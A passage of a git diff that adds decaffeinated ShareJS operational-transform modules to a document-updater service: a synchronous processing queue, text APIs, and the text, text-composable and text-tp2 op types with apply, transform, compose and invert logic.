'left')) { + pos += op2.text.length + } + + return { position: pos, text: op1.text } + }, +} diff --git a/services/document-updater/app/js/sharejs/types/syncqueue.js b/services/document-updater/app/js/sharejs/types/syncqueue.js new file mode 100644 index 0000000..7795923 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/syncqueue.js @@ -0,0 +1,60 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A synchronous processing queue. The queue calls process on the arguments, +// ensuring that process() is only executing once at a time. +// +// process(data, callback) _MUST_ eventually call its callback. +// +// Example: +// +// queue = require 'syncqueue' +// +// fn = queue (data, callback) -> +// asyncthing data, -> +// callback(321) +// +// fn(1) +// fn(2) +// fn(3, (result) -> console.log(result)) +// +// ^--- async thing will only be running once at any time. + +module.exports = function (process) { + if (typeof process !== 'function') { + throw new Error('process is not a function') + } + const queue = [] + + const enqueue = function (data, callback) { + queue.push([data, callback]) + return flush() + } + + enqueue.busy = false + + function flush() { + if (enqueue.busy || queue.length === 0) { + return + } + + enqueue.busy = true + const [data, callback] = Array.from(queue.shift()) + return process(data, function (...result) { + // TODO: Make this not use varargs - varargs are really slow. + enqueue.busy = false + // This is called after busy = false so a user can check if enqueue.busy is set in the callback. + if (callback) { + callback.apply(null, result) + } + return flush() + }) + } + + return enqueue +} diff --git a/services/document-updater/app/js/sharejs/types/text-api.js b/services/document-updater/app/js/sharejs/types/text-api.js new file mode 100644 index 0000000..aa2beef --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-api.js @@ -0,0 +1,52 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text + +let text +if (typeof WEB === 'undefined') { + text = require('./text') +} + +text.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.length + }, + + // Get the text contents of a document + getText() { + return this.snapshot + }, + + insert(pos, text, callback) { + const op = [{ p: pos, i: text }] + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = [{ p: pos, d: this.snapshot.slice(pos, pos + length) }] + + this.submitOp(op, callback) + return op + }, + + _register() { + return this.on('remoteop', function (op) { + return Array.from(op).map(component => + component.i !== undefined + ? this.emit('insert', component.p, component.i) + : this.emit('delete', component.p, component.d) + ) + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/text-composable-api.js b/services/document-updater/app/js/sharejs/types/text-composable-api.js new file mode 100644 index 0000000..122e119 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-composable-api.js @@ -0,0 +1,76 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text + +let type +if (typeof WEB !== 'undefined' && WEB !== null) { + type = exports.types['text-composable'] +} else { + type = require('./text-composable') +} + +type.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.length + }, + + // Get the text contents of a document + getText() { + return this.snapshot + }, + + insert(pos, text, callback) { + const op = type.normalize([pos, { i: text }, this.snapshot.length - pos]) + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = type.normalize([ + pos, + { d: this.snapshot.slice(pos, pos + length) }, + this.snapshot.length - pos - length, + ]) + + this.submitOp(op, callback) + return op + }, + + _register() { + return this.on('remoteop', function (op) { + let pos = 0 + return (() => { + const result = [] + for (const component of Array.from(op)) { + if (typeof component === 'number') { + result.push((pos += component)) + } else if (component.i !== undefined) { + this.emit('insert', pos, component.i) + result.push((pos += component.i.length)) + } else { + // delete + result.push(this.emit('delete', pos, component.d)) + } + } + return result + })() + }) + }, +} +// We don't increment pos, because the position +// specified is after the delete has happened. diff --git a/services/document-updater/app/js/sharejs/types/text-composable.js b/services/document-updater/app/js/sharejs/types/text-composable.js new file mode 100644 index 0000000..199e695 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-composable.js @@ -0,0 +1,400 @@ +/* eslint-disable + no-cond-assign, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// An alternate composable implementation for text. This is much closer +// to the implementation used by google wave. +// +// Ops are lists of components which iterate over the whole document. +// Components are either: +// A number N: Skip N characters in the original document +// {i:'str'}: Insert 'str' at the current position in the document +// {d:'str'}: Delete 'str', which appears at the current position in the document +// +// Eg: [3, {i:'hi'}, 5, {d:'internet'}] +// +// Snapshots are strings. + +let makeAppend +const p = function () {} // require('util').debug +const i = function () {} // require('util').inspect + +const moduleExport = + typeof WEB !== 'undefined' && WEB !== null ? {} : module.exports + +moduleExport.name = 'text-composable' + +moduleExport.create = () => '' + +// -------- Utility methods + +const checkOp = function (op) { + if (!Array.isArray(op)) { + throw new Error('Op must be an array of components') + } + let last = null + return (() => { + const result = [] + for (const c of Array.from(op)) { + if (typeof c === 'object') { + if ( + (c.i == null || !(c.i.length > 0)) && + (c.d == null || !(c.d.length > 0)) + ) { + throw new Error(`Invalid op component: ${i(c)}`) + } + } else { + if (typeof c !== 'number') { + throw new Error('Op components must be objects or numbers') + } + if (!(c > 0)) { + throw new Error('Skip components must be a positive number') + } + if (typeof last === 'number') { + throw new Error('Adjacent skip components should be added') + } + } + + result.push((last = c)) + } + return result + })() +} + +// Makes a function for appending components to a given op. +// Exported for the randomOpGenerator. +moduleExport._makeAppend = makeAppend = op => + function (component) { + if (component === 0 || component.i === '' || component.d === '') { + return + } + if (op.length === 0) { + return op.push(component) + } else if ( + typeof component === 'number' && + typeof op[op.length - 1] === 'number' + ) { + return (op[op.length - 1] += component) + } else if (component.i != null && op[op.length - 1].i != null) { + return (op[op.length - 1].i += component.i) + } else if (component.d != null && op[op.length - 1].d != null) { + return (op[op.length - 1].d += component.d) + } else { + return op.push(component) + } + } + +// checkOp op + +// Makes 2 functions for taking components from the start of an op, and for peeking +// at the next op that could be taken. +const makeTake = function (op) { + // The index of the next component to take + let idx = 0 + // The offset into the component + let offset = 0 + + // Take up to length n from the front of op. If n is null, take the next + // op component. If indivisableField == 'd', delete components won't be separated. + // If indivisableField == 'i', insert components won't be separated. + const take = function (n, indivisableField) { + let c + if (idx === op.length) { + return null + } + // assert.notStrictEqual op.length, i, 'The op is too short to traverse the document' + + if (typeof op[idx] === 'number') { + if (n == null || op[idx] - offset <= n) { + c = op[idx] - offset + ++idx + offset = 0 + return c + } else { + offset += n + return n + } + } else { + // Take from the string + const field = op[idx].i ? 'i' : 'd' + c = {} + if ( + n == null || + op[idx][field].length - offset <= n || + field === indivisableField + ) { + c[field] = op[idx][field].slice(offset) + ++idx + offset = 0 + } else { + c[field] = op[idx][field].slice(offset, offset + n) + offset += n + } + return c + } + } + + const peekType = () => op[idx] + + return [take, peekType] +} + +// Find and return the length of an op component +const componentLength = function (component) { + if (typeof component === 'number') { + return component + } else if (component.i != null) { + return component.i.length + } else { + return component.d.length + } +} + +// Normalize an op, removing all empty skips and empty inserts / deletes. Concatenate +// adjacent inserts and deletes. +moduleExport.normalize = function (op) { + const newOp = [] + const append = makeAppend(newOp) + for (const component of Array.from(op)) { + append(component) + } + return newOp +} + +// Apply the op to the string. Returns the new string. +moduleExport.apply = function (str, op) { + p(`Applying ${i(op)} to '${str}'`) + if (typeof str !== 'string') { + throw new Error('Snapshot should be a string') + } + checkOp(op) + + const pos = 0 + const newDoc = [] + + for (const component of Array.from(op)) { + if (typeof component === 'number') { + if (component > str.length) { + throw new Error('The op is too long for this document') + } + newDoc.push(str.slice(0, component)) + str = str.slice(component) + } else if (component.i != null) { + newDoc.push(component.i) + } else { + if (component.d !== str.slice(0, component.d.length)) { + throw new Error( + `The deleted text '${ + component.d + }' doesn't match the next characters in the document '${str.slice( + 0, + component.d.length + )}'` + ) + } + str = str.slice(component.d.length) + } + } + + if (str !== '') { + throw new Error("The applied op doesn't traverse the entire document") + } + + return newDoc.join('') +} + +// transform op1 by op2. Return transformed version of op1. +// op1 and op2 are unchanged by transform. +moduleExport.transform = function (op, otherOp, side) { + if (side !== 'left' && side !== 'right') { + throw new Error(`side (${side} must be 'left' or 'right'`) + } + + checkOp(op) + checkOp(otherOp) + const newOp = [] + + const append = makeAppend(newOp) + const [take, peek] = Array.from(makeTake(op)) + + for (component of Array.from(otherOp)) { + let chunk, length + if (typeof component === 'number') { + // Skip + length = component + while (length > 0) { + chunk = take(length, 'i') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(chunk) + if (typeof chunk !== 'object' || chunk.i == null) { + length -= componentLength(chunk) + } + } + } else if (component.i != null) { + // Insert + if (side === 'left') { + // The left insert should go first. + const o = peek() + if (o != null ? o.i : undefined) { + append(take()) + } + } + + // Otherwise, skip the inserted text. + append(component.i.length) + } else { + // Delete. + // assert.ok component.d + ;({ length } = component.d) + while (length > 0) { + chunk = take(length, 'i') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + if (typeof chunk === 'number') { + length -= chunk + } else if (chunk.i != null) { + append(chunk) + } else { + // assert.ok chunk.d + // The delete is unnecessary now. + length -= chunk.d.length + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if ((component != null ? component.i : undefined) == null) { + throw new Error(`Remaining fragments in the op: ${i(component)}`) + } + append(component) + } + + return newOp +} + +// Compose 2 ops into 1 op. +moduleExport.compose = function (op1, op2) { + p(`COMPOSE ${i(op1)} + ${i(op2)}`) + checkOp(op1) + checkOp(op2) + + const result = [] + + const append = makeAppend(result) + const [take, _] = Array.from(makeTake(op1)) + + for (component of Array.from(op2)) { + let chunk, length + if (typeof component === 'number') { + // Skip + length = component + while (length > 0) { + chunk = take(length, 'd') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(chunk) + if (typeof chunk !== 'object' || chunk.d == null) { + length -= componentLength(chunk) + } + } + } else if (component.i != null) { + // Insert + append({ i: component.i }) + } else { + // Delete + let offset = 0 + while (offset < component.d.length) { + chunk = take(component.d.length - offset, 'd') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + // If its delete, append it. If its skip, drop it and decrease length. If its insert, check the strings match, drop it and decrease length. + if (typeof chunk === 'number') { + append({ d: component.d.slice(offset, offset + chunk) }) + offset += chunk + } else if (chunk.i != null) { + if (component.d.slice(offset, offset + chunk.i.length) !== chunk.i) { + throw new Error("The deleted text doesn't match the inserted text") + } + offset += chunk.i.length + // The ops cancel each other out. + } else { + // Delete + append(chunk) + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if ((component != null ? component.d : undefined) == null) { + throw new Error(`Trailing stuff in op1 ${i(component)}`) + } + append(component) + } + + return result +} + +const invertComponent = function (c) { + if (typeof c === 'number') { + return c + } else if (c.i != null) { + return { d: c.i } + } else { + return { i: c.d } + } +} + +// Invert an op +moduleExport.invert = function (op) { + const result = [] + const append = makeAppend(result) + + for (const component of Array.from(op)) { + append(invertComponent(component)) + } + + return result +} + +if (typeof window !== 'undefined' && window !== null) { + if (!window.ot) { + window.ot = {} + } + if (!window.ot.types) { + window.ot.types = {} + } + window.ot.types.text = moduleExport +} diff --git a/services/document-updater/app/js/sharejs/types/text-tp2-api.js b/services/document-updater/app/js/sharejs/types/text-tp2-api.js new file mode 100644 index 0000000..1e1b40d --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-tp2-api.js @@ -0,0 +1,133 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text-tp2 + +let type +if (typeof WEB !== 'undefined' && WEB !== null) { + type = exports.types['text-tp2'] +} else { + type = require('./text-tp2') +} + +const { _takeDoc: takeDoc, _append: append } = type + +const appendSkipChars = (op, doc, pos, maxlength) => + (() => { + const result = [] + while ( + (maxlength === undefined || maxlength > 0) && + pos.index < doc.data.length + ) { + const part = takeDoc(doc, pos, maxlength, true) + if (maxlength !== undefined && typeof part === 'string') { + maxlength -= part.length + } + result.push(append(op, part.length || part)) + } + return result + })() + +type.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.charLength + }, + + // Flatten a document into a string + getText() { + const strings = Array.from(this.snapshot.data).filter( + elem => typeof elem === 'string' + ) + return strings.join('') + }, + + insert(pos, text, callback) { + if (pos === undefined) { + pos = 0 + } + + const op = [] + const docPos = { index: 0, offset: 0 } + + appendSkipChars(op, this.snapshot, docPos, pos) + append(op, { i: text }) + appendSkipChars(op, this.snapshot, docPos) + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = [] + const docPos = { index: 0, offset: 0 } + + appendSkipChars(op, this.snapshot, docPos, pos) + + while (length > 0) { + const part = takeDoc(this.snapshot, docPos, length, true) + if (typeof part === 'string') { + append(op, { d: part.length }) + length -= part.length + } else { + append(op, part) + } + } + + appendSkipChars(op, this.snapshot, docPos) + + this.submitOp(op, callback) + return op + }, + + _register() { + // Interpret recieved ops + generate more detailed events for them + return this.on('remoteop', function (op, snapshot) { + let textPos = 0 + const docPos = { index: 0, offset: 0 } + + for (const component of Array.from(op)) { + let part, remainder + if (typeof component === 'number') { + // Skip + remainder = component + while (remainder > 0) { + part = takeDoc(snapshot, docPos, remainder) + if (typeof part === 'string') { + textPos += part.length + } + remainder -= part.length || part + } + } else if (component.i !== undefined) { + // Insert + if (typeof component.i === 'string') { + this.emit('insert', textPos, component.i) + textPos += component.i.length + } + } else { + // Delete + remainder = component.d + while (remainder > 0) { + part = takeDoc(snapshot, docPos, remainder) + if (typeof part === 'string') { + this.emit('delete', textPos, part) + } + remainder -= part.length || part + } + } + } + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/text-tp2.js b/services/document-updater/app/js/sharejs/types/text-tp2.js new file mode 100644 index 0000000..c3ff9ec --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-tp2.js @@ -0,0 +1,499 @@ +/* eslint-disable + no-cond-assign, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A TP2 implementation of text, following this spec: +// http://code.google.com/p/lightwave/source/browse/trunk/experimental/ot/README +// +// A document is made up of a string and a set of tombstones inserted throughout +// the string. For example, 'some ', (2 tombstones), 'string'. +// +// This is encoded in a document as: {s:'some string', t:[5, -2, 6]} +// +// Ops are lists of components which iterate over the whole document. +// Components are either: +// N: Skip N characters in the original document +// {i:'str'}: Insert 'str' at the current position in the document +// {i:N}: Insert N tombstones at the current position in the document +// {d:N}: Delete (tombstone) N characters at the current position in the document +// +// Eg: [3, {i:'hi'}, 5, {d:8}] +// +// Snapshots are lists with characters and tombstones. Characters are stored in strings +// and adjacent tombstones are flattened into numbers. +// +// Eg, the document: 'Hello .....world' ('.' denotes tombstoned (deleted) characters) +// would be represented by a document snapshot of ['Hello ', 5, 'world'] + +let append, appendDoc, takeDoc +const type = { + name: 'text-tp2', + tp2: true, + create() { + return { charLength: 0, totalLength: 0, positionCache: [], data: [] } + }, + serialize(doc) { + if (!doc.data) { + throw new Error('invalid doc snapshot') + } + return doc.data + }, + deserialize(data) { + const doc = type.create() + doc.data = data + + for (const component of Array.from(data)) { + if (typeof component === 'string') { + doc.charLength += component.length + doc.totalLength += component.length + } else { + doc.totalLength += component + } + } + + return doc + }, +} + +const checkOp = function (op) { + if (!Array.isArray(op)) { + throw new Error('Op must be an array of components') + } + let last = null + return (() => { + const result = [] + for (const c of Array.from(op)) { + if (typeof c === 'object') { + if (c.i !== undefined) { + if ( + (typeof c.i !== 'string' || !(c.i.length > 0)) && + (typeof c.i !== 'number' || !(c.i > 0)) + ) { + throw new Error('Inserts must insert a string or a +ive number') + } + } else if (c.d !== undefined) { + if (typeof c.d !== 'number' || !(c.d > 0)) { + throw new Error('Deletes must be a +ive number') + } + } else { + throw new Error('Operation component must define .i or .d') + } + } else { + if (typeof c !== 'number') { + throw new Error('Op components must be objects or numbers') + } + if (!(c > 0)) { + throw new Error('Skip components must be a positive number') + } + if (typeof last === 'number') { + throw new Error('Adjacent skip components should be combined') + } + } + + result.push((last = c)) + } + return result + })() +} + +// Take the next part from the specified position in a document snapshot. +// position = {index, offset}. It will be updated. +type._takeDoc = takeDoc = function ( + doc, + position, + maxlength, + tombsIndivisible +) { + if (position.index >= doc.data.length) { + throw new Error('Operation goes past the end of the document') + } + + const part = doc.data[position.index] + // peel off data[0] + const result = + typeof part === 'string' + ? maxlength !== undefined + ? part.slice(position.offset, position.offset + maxlength) + : part.slice(position.offset) + : maxlength === undefined || tombsIndivisible + ? part - position.offset + : Math.min(maxlength, part - position.offset) + + const resultLen = result.length || result + + if ((part.length || part) - position.offset > resultLen) { + position.offset += resultLen + } else { + position.index++ + position.offset = 0 + } + + return result +} + +// Append a part to the end of a document +type._appendDoc = appendDoc = function (doc, p) { + if (p === 0 || p === '') { + return + } + + if (typeof p === 'string') { + doc.charLength += p.length + doc.totalLength += p.length + } else { + doc.totalLength += p + } + + const { data } = doc + if (data.length === 0) { + data.push(p) + } else if (typeof data[data.length - 1] === typeof p) { + data[data.length - 1] += p + } else { + data.push(p) + } +} + +// Apply the op to the document. The document is not modified in the process. +type.apply = function (doc, op) { + if ( + doc.totalLength === undefined || + doc.charLength === undefined || + doc.data.length === undefined + ) { + throw new Error('Snapshot is invalid') + } + + checkOp(op) + + const newDoc = type.create() + const position = { index: 0, offset: 0 } + + for (const component of Array.from(op)) { + let part, remainder + if (typeof component === 'number') { + remainder = component + while (remainder > 0) { + part = takeDoc(doc, position, remainder) + + appendDoc(newDoc, part) + remainder -= part.length || part + } + } else if (component.i !== undefined) { + appendDoc(newDoc, component.i) + } else if (component.d !== undefined) { + remainder = component.d + while (remainder > 0) { + part = takeDoc(doc, position, remainder) + remainder -= part.length || part + } + appendDoc(newDoc, component.d) + } + } + + return newDoc +} + +// Append an op component to the end of the specified op. +// Exported for the randomOpGenerator. +type._append = append = function (op, component) { + if ( + component === 0 || + component.i === '' || + component.i === 0 || + component.d === 0 + ) { + return + } + if (op.length === 0) { + return op.push(component) + } else { + const last = op[op.length - 1] + if (typeof component === 'number' && typeof last === 'number') { + return (op[op.length - 1] += component) + } else if ( + component.i !== undefined && + last.i != null && + typeof last.i === typeof component.i + ) { + return (last.i += component.i) + } else if (component.d !== undefined && last.d != null) { + return (last.d += component.d) + } else { + return op.push(component) + } + } +} + +// Makes 2 functions for taking components from the start of an op, and for peeking +// at the next op that could be taken. +const makeTake = function (op) { + // The index of the next component to take + let index = 0 + // The offset into the component + let offset = 0 + + // Take up to length maxlength from the op. If maxlength is not defined, there is no max. + // If insertsIndivisible is true, inserts (& insert tombstones) won't be separated. + // + // Returns null when op is fully consumed. + const take = function (maxlength, insertsIndivisible) { + let current + if (index === op.length) { + return null + } + + const e = op[index] + if ( + typeof (current = e) === 'number' || + typeof (current = e.i) === 'number' || + (current = e.d) !== undefined + ) { + let c + if ( + maxlength == null || + current - offset <= maxlength || + (insertsIndivisible && e.i !== undefined) + ) { + // Return the rest of the current element. + c = current - offset + ++index + offset = 0 + } else { + offset += maxlength + c = maxlength + } + if (e.i !== undefined) { + return { i: c } + } else if (e.d !== undefined) { + return { d: c } + } else { + return c + } + } else { + // Take from the inserted string + let result + if ( + maxlength == null || + e.i.length - offset <= maxlength || + insertsIndivisible + ) { + result = { i: e.i.slice(offset) } + ++index + offset = 0 + } else { + result = { i: e.i.slice(offset, offset + maxlength) } + offset += maxlength + } + return result + } + } + + const peekType = () => op[index] + + return [take, peekType] +} + +// Find and return the length of an op component +const componentLength = function (component) { + if (typeof component === 'number') { + return component + } else if (typeof component.i === 'string') { + return component.i.length + } else { + // This should work because c.d and c.i must be +ive. + return component.d || component.i + } +} + +// Normalize an op, removing all empty skips and empty inserts / deletes. Concatenate +// adjacent inserts and deletes. +type.normalize = function (op) { + const newOp = [] + for (const component of Array.from(op)) { + append(newOp, component) + } + return newOp +} + +// This is a helper method to transform and prune. goForwards is true for transform, false for prune. +const transformer = function (op, otherOp, goForwards, side) { + let component + checkOp(op) + checkOp(otherOp) + const newOp = [] + + const [take, peek] = Array.from(makeTake(op)) + + for (component of Array.from(otherOp)) { + let chunk + let length = componentLength(component) + + if (component.i !== undefined) { + // Insert text or tombs + if (goForwards) { + // transform - insert skips over inserted parts + if (side === 'left') { + // The left insert should go first. + while (__guard__(peek(), x => x.i) !== undefined) { + append(newOp, take()) + } + } + + // In any case, skip the inserted text. + append(newOp, length) + } else { + // Prune. Remove skips for inserts. + while (length > 0) { + chunk = take(length, true) + + if (chunk === null) { + throw new Error('The transformed op is invalid') + } + if (chunk.d !== undefined) { + throw new Error( + 'The transformed op deletes locally inserted characters - it cannot be purged of the insert.' + ) + } + + if (typeof chunk === 'number') { + length -= chunk + } else { + append(newOp, chunk) + } + } + } + } else { + // Skip or delete + while (length > 0) { + chunk = take(length, true) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(newOp, chunk) + if (!chunk.i) { + length -= componentLength(chunk) + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if (component.i === undefined) { + throw new Error(`Remaining fragments in the op: ${component}`) + } + append(newOp, component) + } + + return newOp +} + +// transform op1 by op2. Return transformed version of op1. +// op1 and op2 are unchanged by transform. +// side should be 'left' or 'right', depending on if op1.id <> op2.id. 'left' == client op. +type.transform = function (op, otherOp, side) { + if (side !== 'left' && side !== 'right') { + throw new Error(`side (${side}) should be 'left' or 'right'`) + } + return transformer(op, otherOp, true, side) +} + +// Prune is the inverse of transform. +type.prune = (op, otherOp) => transformer(op, otherOp, false) + +// Compose 2 ops into 1 op. +type.compose = function (op1, op2) { + let component + if (op1 === null || op1 === undefined) { + return op2 + } + + checkOp(op1) + checkOp(op2) + + const result = [] + + const [take, _] = Array.from(makeTake(op1)) + + for (component of Array.from(op2)) { + let chunk, length + if (typeof component === 'number') { + // Skip + // Just copy from op1. + length = component + while (length > 0) { + chunk = take(length) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(result, chunk) + length -= componentLength(chunk) + } + } else if (component.i !== undefined) { + // Insert + append(result, { i: component.i }) + } else { + // Delete + length = component.d + while (length > 0) { + chunk = take(length) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + const chunkLength = componentLength(chunk) + if (chunk.i !== undefined) { + append(result, { i: chunkLength }) + } else { + append(result, { d: chunkLength }) + } + + length -= chunkLength + } + } + } + + // Append extras from op1 + while ((component = take())) { + if (component.i === undefined) { + throw new Error(`Remaining fragments in op1: ${component}`) + } + append(result, component) + } + + return result +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + exports.types['text-tp2'] = type +} else { + module.exports = type +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? transform(value) + : undefined +} diff --git a/services/document-updater/app/js/sharejs/types/text.js b/services/document-updater/app/js/sharejs/types/text.js new file mode 100644 index 0000000..ece4f86 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text.js @@ -0,0 +1,387 @@ +/* eslint-disable + no-return-assign, + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A simple text implementation +// +// Operations are lists of components. +// Each component either inserts or deletes at a specified position in the document. +// +// Components are either: +// {i:'str', p:100}: Insert 'str' at position 100 in the document +// {d:'str', p:100}: Delete 'str' at position 100 in the document +// +// Components in an operation are executed sequentially, so the position of components +// assumes previous components have already executed. +// +// Eg: This op: +// [{i:'abc', p:0}] +// is equivalent to this op: +// [{i:'a', p:0}, {i:'b', p:1}, {i:'c', p:2}] + +// NOTE: The global scope here is shared with other sharejs files when built with closure. +// Be careful what ends up in your namespace. + +let append, transformComponent +const text = {} + +text.name = 'text' + +text.create = () => '' + +const strInject = (s1, pos, s2) => s1.slice(0, pos) + s2 + s1.slice(pos) + +const checkValidComponent = function (c) { + if (typeof c.p !== 'number') { + throw new Error('component missing position field') + } + + const iType = typeof c.i + const dType = typeof c.d + const cType = typeof c.c + if (!((iType === 'string') ^ (dType === 'string') ^ (cType === 'string'))) { + throw new Error('component needs an i, d or c field') + } + + if (!(c.p >= 0)) { + throw new Error('position cannot be negative') + } +} + +const checkValidOp = function (op) { + for (const c of Array.from(op)) { + checkValidComponent(c) + } + return true +} + +text.apply = function (snapshot, op) { + checkValidOp(op) + for (const component of Array.from(op)) { + if (component.i != null) { + snapshot = strInject(snapshot, component.p, component.i) + } else if (component.d != null) { + const deleted = snapshot.slice( + component.p, + component.p + component.d.length + ) + if (component.d !== deleted) { + throw new Error( + `Delete component '${component.d}' does not match deleted text '${deleted}'` + ) + } + snapshot = + snapshot.slice(0, component.p) + + snapshot.slice(component.p + component.d.length) + } else if (component.c != null) { + const comment = snapshot.slice( + component.p, + component.p + component.c.length + ) + if (component.c !== comment) { + throw new Error( + `Comment component '${component.c}' does not match commented text '${comment}'` + ) + } + } else { + throw new Error('Unknown op type') + } + } + return snapshot +} + +// Exported for use by the random op generator. +// +// For simplicity, this version of append does not compress adjacent inserts and deletes of +// the same text. It would be nice to change that at some stage. +text._append = append = function (newOp, c) { + if (c.i === '' || c.d === '') { + return + } + if (newOp.length === 0) { + return newOp.push(c) + } else { + const last = newOp[newOp.length - 1] + + // Compose the insert into the previous insert if possible + if ( + last.i != null && + c.i != null && + last.p <= c.p && + c.p <= last.p + last.i.length + ) { + return (newOp[newOp.length - 1] = { + i: strInject(last.i, c.p - last.p, c.i), + p: last.p, + }) + } else if ( + last.d != null && + c.d != null && + c.p <= last.p && + last.p <= c.p + c.d.length + ) { + return (newOp[newOp.length - 1] = { + d: strInject(c.d, last.p - c.p, last.d), + p: c.p, + }) + } else { + return newOp.push(c) + } + } +} + +text.compose = function (op1, op2) { + checkValidOp(op1) + checkValidOp(op2) + + const newOp = op1.slice() + for (const c of Array.from(op2)) { + append(newOp, c) + } + + return newOp +} + +// Attempt to compress the op components together 'as much as possible'. +// This implementation preserves order and preserves create/delete pairs. +text.compress = op => text.compose([], op) + +text.normalize = function (op) { + const newOp = [] + + // Normalize should allow ops which are a single (unwrapped) component: + // {i:'asdf', p:23}. + // There's no good way to test if something is an array: + // http://perfectionkills.com/instanceof-considered-harmful-or-how-to-write-a-robust-isarray/ + // so this is probably the least bad solution. + if (op.i != null || op.p != null) { + op = [op] + } + + for (const c of Array.from(op)) { + if (c.p == null) { + c.p = 0 + } + append(newOp, c) + } + + return newOp +} + +// This helper method transforms a position by an op component. +// +// If c is an insert, insertAfter specifies whether the transform +// is pushed after the insert (true) or before it (false). +// +// insertAfter is optional for deletes. +const transformPosition = function (pos, c, insertAfter) { + if (c.i != null) { + if (c.p < pos || (c.p === pos && insertAfter)) { + return pos + c.i.length + } else { + return pos + } + } else if (c.d != null) { + // I think this could also be written as: Math.min(c.p, Math.min(c.p - otherC.p, otherC.d.length)) + // but I think its harder to read that way, and it compiles using ternary operators anyway + // so its no slower written like this. + if (pos <= c.p) { + return pos + } else if (pos <= c.p + c.d.length) { + return c.p + } else { + return pos - c.d.length + } + } else if (c.c != null) { + return pos + } else { + throw new Error('unknown op type') + } +} + +// Helper method to transform a cursor position as a result of an op. +// +// Like transformPosition above, if c is an insert, insertAfter specifies whether the cursor position +// is pushed after an insert (true) or before it (false). +text.transformCursor = function (position, op, side) { + const insertAfter = side === 'right' + for (const c of Array.from(op)) { + position = transformPosition(position, c, insertAfter) + } + return position +} + +// Transform an op component by another op component. Asymmetric. +// The result will be appended to destination. +// +// exported for use in JSON type +text._tc = transformComponent = function (dest, c, otherC, side) { + let cIntersect, intersectEnd, intersectStart, newC, otherIntersect + checkValidOp([c]) + checkValidOp([otherC]) + + if (c.i != null) { + append(dest, { + i: c.i, + p: transformPosition(c.p, otherC, side === 'right'), + }) + } else if (c.d != null) { + // Delete + if (otherC.i != null) { + // delete vs insert + let s = c.d + if (c.p < otherC.p) { + append(dest, { d: s.slice(0, otherC.p - c.p), p: c.p }) + s = s.slice(otherC.p - c.p) + } + if (s !== '') { + append(dest, { 